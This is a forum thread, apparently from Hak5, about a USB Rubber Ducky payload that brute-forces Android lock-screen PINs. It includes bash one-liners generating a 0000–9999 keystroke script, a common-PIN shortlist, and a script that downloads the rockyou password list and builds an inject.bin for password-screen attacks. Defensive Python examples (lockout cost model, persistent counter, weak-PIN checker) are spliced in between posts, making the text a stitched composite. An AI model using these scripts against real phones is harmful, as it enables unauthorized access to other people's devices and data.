
[Payload] Android Brute Force 4-digit pin



I'll be demoing this on next week's Hak5 episode but figured I'd post it here first and get some feedback. Thus far it works perfectly on a Galaxy Nexus running the latest Android 4.2.1. I've also tested it with a Galaxy Note 2 running 4.2.1 and it ran as expected.

20121205_125338.jpg

I'm very surprised that with the stock Android OS and recommended settings of setting a PIN code this was possible. I had expected the phone to reset or format after 100 attempts or something like that.

With a 4 digit PIN and the default of 5 tries followed by a 30 second timeout you're looking at a best case scenario of exhausting the key space in about 16.6 hours. Not bad all things considered. If you're the NSA or the Mafia that's totally reasonable, I'd say. Thankfully the USB Rubber Ducky never gets tired, bored or has to pee.

Rather than post the nearly 600K duckyscript I'll just post the bit of bash I used to create it. You could modify it to do 5 digit, but that would take 166 hours. 10 digit would take 1902.2 years. ;-)


[CODE]echo DELAY 5000 > android_brute-force_0000-9999.txt; echo {0000..9999} | xargs -n 1 echo STRING | sed '0~5 s/$/\nWAIT/g' | sed '0~1 s/$/\nDELAY 1000\nENTER\nENTER/g' | sed 's/WAIT/DELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER/g' >> android_brute-force_0000-9999.txt[/CODE]

  • Upvote 7
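The timing figures in the post follow from a simple model: keyspace divided by the attempts allowed per lockout, multiplied by the lockout length. The Python below is an added illustration (not Darren's code or anything else from the thread) that computes that cost for any PIN length and lockout policy, and contrasts a timed lockout with the wipe-after-N-failures policy the post expected to find. The 5 tries / 30 s values are the thread's; the per-attempt overhead parameter and the wipe thresholds in the demo are assumed values.

```python
"""Cost of exhaustively guessing a numeric PIN under a lockout policy.

Added illustration for the thread above, not code from it. The policy
values (5 attempts, then a 30 second wait) are the ones the thread
describes; the functions take them as parameters so that other policies
can be compared side by side.
"""

SECONDS_PER_HOUR = 3600
SECONDS_PER_YEAR = 365 * 24 * SECONDS_PER_HOUR


def keyspace(pin_length: int) -> int:
    """Number of distinct all-digit PINs of the given length."""
    return 10 ** pin_length


def worst_case_seconds(pin_length: int, tries_per_lockout: int,
                       lockout_seconds: float,
                       per_try_seconds: float = 0.0) -> float:
    """Seconds needed to try every PIN once.

    A wait of lockout_seconds follows each full block of tries_per_lockout
    attempts. per_try_seconds is the keystroke/submit overhead per attempt
    (an assumed parameter); the thread's 16.6 hour figure counts only the
    waits, so it defaults to 0.
    """
    n = keyspace(pin_length)
    lockouts = n // tries_per_lockout
    return n * per_try_seconds + lockouts * lockout_seconds


def worst_case_hours(*args, **kwargs) -> float:
    return worst_case_seconds(*args, **kwargs) / SECONDS_PER_HOUR


def worst_case_years(*args, **kwargs) -> float:
    return worst_case_seconds(*args, **kwargs) / SECONDS_PER_YEAR


def success_probability_with_wipe(pin_length: int, wipe_after: int) -> float:
    """Chance a guesser finds the PIN before a wipe-after-N policy erases
    the device, assuming a uniformly random PIN. With a wipe the attacker
    gets wipe_after guesses in total, however long they are willing to wait,
    so time is no longer the limiting factor."""
    n = keyspace(pin_length)
    return min(wipe_after, n) / n


if __name__ == "__main__":
    for length in (4, 5, 10):
        hours = worst_case_hours(length, 5, 30)
        years = worst_case_years(length, 5, 30)
        print(f"{length}-digit PIN, 5 tries / 30 s lockout: "
              f"{hours:,.1f} h ({years:,.1f} years)")
    for wipe_after in (10, 100):   # assumed thresholds for the comparison
        p = success_probability_with_wipe(4, wipe_after)
        print(f"4-digit PIN, wipe after {wipe_after} failures: "
              f"guess succeeds with probability {p:.2%}")
```

Run as a script it reproduces the thread's 16.7 h / 166.7 h / ~1900 year figures and shows why a wipe threshold, not a longer timeout, is what changes the picture: with 10 guesses in total, the guesser's odds are 0.1% regardless of patience.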

No, this doesn't require anything special on the Android side. All of these android payloads have been tested on a stock Galaxy Nexus running the latest 4.2.1 firmware. I have tested many other devices and they have all worked well with the ducky. It seems Android loved HID as much as any other computer.

For that matter, iPhone should be the same - just requires the right 30-pin to USB adapter.

  • Upvote 1


Good to know, can't wait for your final version. Need to pick myself up a new and improved ducky (currently only have the dev teensy; I was one of the lucky ones) next week when I get paid... along with other hakshop goodies :D


I am running CYGWIN and am having some problems with the script. Can anyone see what is happening with the script? Here is my command line.

[CODE]C:\Users\UserName\Desktop>echo DELAY 5000 > android_brute-force_0000-9999.txt; echo {0000..9999} | xargs -n 1 echo STRING | sed '0~5 s/$/\nWAIT/g' | sed '0~1 s/$/\nDELAY 1000\nENTER\nENTER/g' | sed 's/WAIT/DELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER/g' >> android_brute-force_0000-9999.txt

C:\Users\UserName\Desktop>dir android*
 Volume in drive C has no label.
 Volume Serial Number is 2499-C7D7

 Directory of C:\Users\UserName\Desktop

07/07/2012  01:03 AM           165 Android Paths.txt
08/30/2012  08:00 PM            50 Android SDK Path.txt
12/09/2012  02:26 PM            63 android_brute-force_0000-9999.txt
               3 File(s)        278 bytes
               0 Dir(s)  831,818,436,608 bytes free

C:\Users\UserName\Desktop>type android_brute-force_0000-9999.txt
DELAY 5000 ; echo {0000..9999}
STRING
DELAY 1000
ENTER
ENTER

C:\Users\UserName\Desktop>[/CODE]

Edited by overwraith

To adapt Darren's simple script to generate android.txt on OSX, you need MacPorts installed and you need to install gsed (gnu-sed), as gnu-sed is slightly different to OSX's default bsd-sed.

[CODE]port install gsed[/CODE]

then:

[CODE]echo DELAY 5000 > android_brute-force_0000-9999.txt; echo {0000..9999} | xargs -n 1 echo STRING | gsed '0~5 s/$/\nWAIT/g' | gsed '0~1 s/$/\nDELAY 1000\nENTER\nENTER/g' | gsed 's/WAIT/DELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER/g' >> android_brute-force_0000-9999.txt[/CODE]

Not sure what's going wrong with cygwin?


I created a script to generate pretty much the same output using only bash loops/conditions.


[CODE]#!/bin/bash
count=0
echo "DELAY 5000"
for pin in {0000..9999}
do
    count=$((count+1))
    echo "STRING $pin"
    # After every other pin, do this
    if [ $((count % 2)) -eq 0 ]; then
        echo "DELAY 1000"
        echo "ENTER"
        echo "ENTER"
    fi
    # After 5 pins, do this
    if [ $((count % 5)) -eq 0 ]; then
        for (( delay=0; delay<4; delay++ ))
        do
            echo "DELAY 5000"
            echo "ENTER"
        done
    fi
done[/CODE]


You probably could get a huge performance boost out of this method if you tweaked your PIN list a little.

Most common PINs would be any combinations with all the same numbers like 0000, 1111, 2222, 3333, etc. So you should probably try those first, then things like 1234, 1212, 4321, 6969. Because people like patterns and people are lazy and don't want to remember more than two numbers.

Just my two cents.

  • Like 1
  • Upvote 3

It is kind of odd they didn't lock down the device after a certain number of tries as pattern lock does that after 20 tries.

And once it gets locked down you'll need your gmail password to unlock. (Which also sort of fails as well cause reboot resets the counter)

Edited by Kag
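Kag's observation that a reboot resets the counter is a state-persistence problem: a lockout counter held only in memory is gone after a restart. As an added example (not from the thread, and not Android's own implementation), the Python class below keeps the failure count and the lockout deadline in a small JSON file and reloads them on construction, so a fresh instance, standing in for a reboot, continues the lockout and can also enforce a wipe threshold. The 5 tries / 30 s values are the thread's; the state file path, the injectable clock and the wipe threshold of 10 are assumptions for the demo.

```python
"""Failed-attempt counter that survives a restart.

Added illustration for the thread above, not code from it or from Android.
State (failure count, lockout deadline) is written to a JSON file with an
atomic rename, and read back when the object is created, so a reboot does
not hand the guesser a fresh set of attempts.
"""
import json
import os
import tempfile
import time


class PersistentLockout:
    def __init__(self, state_path, max_tries=5, lockout_seconds=30,
                 wipe_after=None, clock=time.time):
        self.state_path = state_path          # assumed location of the state file
        self.max_tries = max_tries
        self.lockout_seconds = lockout_seconds
        self.wipe_after = wipe_after          # None = no wipe policy
        self.clock = clock                    # injectable for deterministic tests
        self.failures = 0
        self.locked_until = 0.0
        self._load()

    def _load(self):
        """Restore persisted state if the file exists (it does after a 'reboot')."""
        if os.path.exists(self.state_path):
            with open(self.state_path) as f:
                state = json.load(f)
            self.failures = int(state.get("failures", 0))
            self.locked_until = float(state.get("locked_until", 0.0))

    def _save(self):
        """Write to a temp file and rename, so a crash never leaves half-written state."""
        tmp = self.state_path + ".tmp"
        with open(tmp, "w") as f:
            json.dump({"failures": self.failures,
                       "locked_until": self.locked_until}, f)
        os.replace(tmp, self.state_path)

    def wipe_required(self) -> bool:
        return self.wipe_after is not None and self.failures >= self.wipe_after

    def attempt_allowed(self) -> bool:
        """An attempt may proceed only when no wipe is pending and no lockout is active."""
        return not self.wipe_required() and self.clock() >= self.locked_until

    def record_failure(self):
        self.failures += 1
        # every max_tries consecutive failures start a new timed lockout
        if self.failures % self.max_tries == 0:
            self.locked_until = self.clock() + self.lockout_seconds
        self._save()

    def record_success(self):
        """A correct PIN clears the counter and any lockout."""
        self.failures = 0
        self.locked_until = 0.0
        self._save()


def demo(directory=None) -> dict:
    """Walk through the reboot scenario with a fake clock; returns what was observed."""
    workdir = directory or tempfile.mkdtemp()
    path = os.path.join(workdir, "lockout_state.json")   # assumed file name
    now = [1000.0]
    clock = lambda: now[0]

    first = PersistentLockout(path, wipe_after=10, clock=clock)
    for _ in range(5):
        first.record_failure()
    result = {"locked_after_5": not first.attempt_allowed()}

    # new object, same file: this is the 'reboot'
    rebooted = PersistentLockout(path, wipe_after=10, clock=clock)
    result["still_locked_after_reboot"] = not rebooted.attempt_allowed()
    result["failures_after_reboot"] = rebooted.failures

    now[0] += 30                                   # lockout expires
    result["allowed_after_timeout"] = rebooted.attempt_allowed()
    for _ in range(5):
        rebooted.record_failure()
    result["wipe_after_10"] = rebooted.wipe_required()
    return result


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The two design points are the atomic rename in `_save` (a crash mid-write must not corrupt the counter into something that parses as zero) and counting total failures rather than failures since boot, which is what makes a wipe threshold meaningful.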

Hello everybody,

I must say that I am surprised that no one (only Totu) suggested to use a handcrafted dictionary. I mean, you all probably read the article on CC PIN security. I think if you try to brute-force your way into a device with PIN you should really use that list, instead of a generated one.

Here is the study?

http://www.datagenet...september32012/

and here are the first 10 pins I would try:

1234
1111
0000
1212
7777
1004
2000
4444
2222
6969

1 in 4 chance of hacking the device in under a minute!

What do you say?

Edited by iamnoxtras
  • Upvote 1
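A list like the one above is at least as useful to a defender as to a guesser: it is exactly the check a lock-screen setup flow should run before accepting a PIN. The Python below is an added example (not from the thread or from the cited study) that seeds a blocklist with the ten PINs listed in the post and adds pattern rules for single-digit, sequential, repeated-half and year-like PINs. The rules and the 1900–2099 year range are assumptions about what such a policy should catch; a deployment would load the study's full list.

```python
"""Reject PINs that are trivially guessable.

Added illustration for the thread above, not code from it. The blocklist is
seeded with the ten PINs quoted in the post; the pattern rules are assumed
policy choices, shown here so each rejection carries a reason the user can
act on.
"""

# The ten PINs listed in the post above (seed only; a real blocklist is longer).
COMMON_PINS = {"1234", "1111", "0000", "1212", "7777",
               "1004", "2000", "4444", "2222", "6969"}

DIGITS = set("0123456789")


def _is_run(pin: str) -> bool:
    """True for ascending or descending runs such as 1234, 9876, 2345."""
    steps = {int(b) - int(a) for a, b in zip(pin, pin[1:])}
    return steps == {1} or steps == {-1}


def _is_repeated_half(pin: str) -> bool:
    """True when the first half is simply repeated: 1212, 383838."""
    half = len(pin) // 2
    return len(pin) % 2 == 0 and pin[:half] * 2 == pin


def _looks_like_year(pin: str) -> bool:
    """Assumed rule: four-digit values that read as a birth or current year."""
    return len(pin) == 4 and 1900 <= int(pin) <= 2099


def pin_weaknesses(pin: str, min_length: int = 4, blocklist=COMMON_PINS) -> list:
    """Return the policy rules the PIN violates; an empty list means acceptable."""
    if not pin:
        return ["empty"]
    if not set(pin) <= DIGITS:
        return ["not all digits"]
    reasons = []
    if len(pin) < min_length:
        reasons.append("too short")
    if pin in blocklist:
        reasons.append("on common-PIN blocklist")
    if len(set(pin)) == 1:
        reasons.append("single repeated digit")
    elif _is_run(pin):
        reasons.append("sequential digits")
    elif _is_repeated_half(pin):
        reasons.append("repeated pattern")
    if _looks_like_year(pin):
        reasons.append("looks like a year")
    return reasons


def is_acceptable_pin(pin: str, **kwargs) -> bool:
    return not pin_weaknesses(pin, **kwargs)


if __name__ == "__main__":
    # constructed sample inputs: the post's top three plus a few others
    for candidate in ("1234", "1111", "0000", "1987", "9876", "3838", "7395"):
        verdict = pin_weaknesses(candidate)
        print(f"{candidate}: {'ok' if not verdict else ', '.join(verdict)}")
```

Returning the list of violated rules rather than a bare boolean lets the setup screen explain the rejection, which is what gets users to pick something other than the next entry on the same list.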

Another good thing to do would be to download the rockyou password list from SkullSecurity. Take the top 5000 out of it, as it is already sorted from most frequently used to least. If a device is encrypted this will save you tons of time, as there is no "5 passwords, then wait" limiter.

** Edit **

Here is a script that will grab rockyou.txt and create a payload for you on Linux. Right now it does wait 30 seconds after every 5 passwords. I'm adding an option to not wait 30 seconds, as if attacking the encryption logon screen.


[CODE]#!/bin/bash
clear
echo -e "========================================================"
echo -e " This script downloads the rockyou password list"
echo -e " then takes the top 5000 passwords and generates"
echo -e " an Android brute forcer."
echo -e "========================================================"
echo -e " You need to have duckencode.jar installed as well"
echo -e " as bzip2 and wget."
echo -e "========================================================"
echo -e " This script is licensed under the GPLv3 and is"
echo -e " currently maintained by James Luther (CaptainHooligan)"
echo -e "========================================================"
echo ""
echo ""
WHOAMI=$(id | sed -e 's/(.*//')
if [ "$WHOAMI" != "uid=0" ] ; then
    echo "Sorry, you need super user access to run this script."
    exit 1
fi
echo -e "Verifying prerequisites are installed ... "
echo ""
# find returns the full path of the jar; keep the first hit and run java against that path later
duckjar=$(find / -name duckencode.jar 2>/dev/null | head -n 1)
if [ -z "$duckjar" ] ; then
    echo "Duckencode.jar not found on system. Please verify you have this installed."
    exit 1
else
    echo "Duckencode.jar prerequisite met."
fi
# bzip2 and wget: accept them if they are on PATH, otherwise locate the binary and add its directory
for tool in bzip2 wget ; do
    if ! command -v "$tool" >/dev/null 2>&1 ; then
        toolpath=$(find / -type f -name "$tool" 2>/dev/null | head -n 1)
        if [ -z "$toolpath" ] ; then
            echo "$tool not found on system. Please verify you have this installed."
            exit 1
        fi
        PATH=$PATH:$(dirname "$toolpath")
    fi
    echo "$tool prerequisite met."
done
echo ""
echo ""
#echo -e "Which do you want to attack?"
#echo -e " 1. Encryption Screen"
#echo -e " 2. Password Screen"
#read answer
#case answer
# 1)
echo -e "Verify connection to internet and press [Enter]."
read
echo ""
echo ""
echo -e "Downloading rockyou password list. This can take some time ..."
echo ""
echo ""
wget http://downloads.skullsecurity.org/passwords/rockyou.txt.bz2
bunzip2 rockyou.txt.bz2
echo ""
echo ""
echo -e "Creating rock-android.txt file ... "
echo ""
echo ""
echo DELAY 5000 > rock-android.txt; head -5000 rockyou.txt | sed -e 's/^/STRING /' | sed '0~5 s/$/\nWAIT/g' | sed '0~1 s/$/\nDELAY 1000\nENTER\nENTER/g' | sed 's/WAIT/DELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER/g' >> rock-android.txt
echo -e "rock-android.txt created!"
ls -lart rock-android.txt
echo ""
echo ""
echo -e "Creating inject.bin file ... "
java -jar "$duckjar" -i rock-android.txt
echo ""
echo ""
echo -e "Inject.bin created. Copy this over to your sdcard and enjoy!"
ls -lart inject.bin[/CODE]

Edited by CaptainHooligan
  • Upvote 1


Will it continue to go deep into the brute forcing even with a different pin lock screen? For example the Galaxy S3 might have a different login screen for PINs than the Nexus because of touchwiz. Does that affect the payload at all? Would it press the wrong numbers or keys because of a different key layout?


Hi All,

I have a Motorola ME863 cell phone and after a few Xmas drinks was a prat and changed my 4 digit number pass code ....and yup you guessed it ...promptly forgot the damn thing.

Is there anyone in the UK southeast / Berks/Bucks/ London area that can help me fix without having to do a factory reset ?

Many thanks in advance for all and any help

Rgds

JD

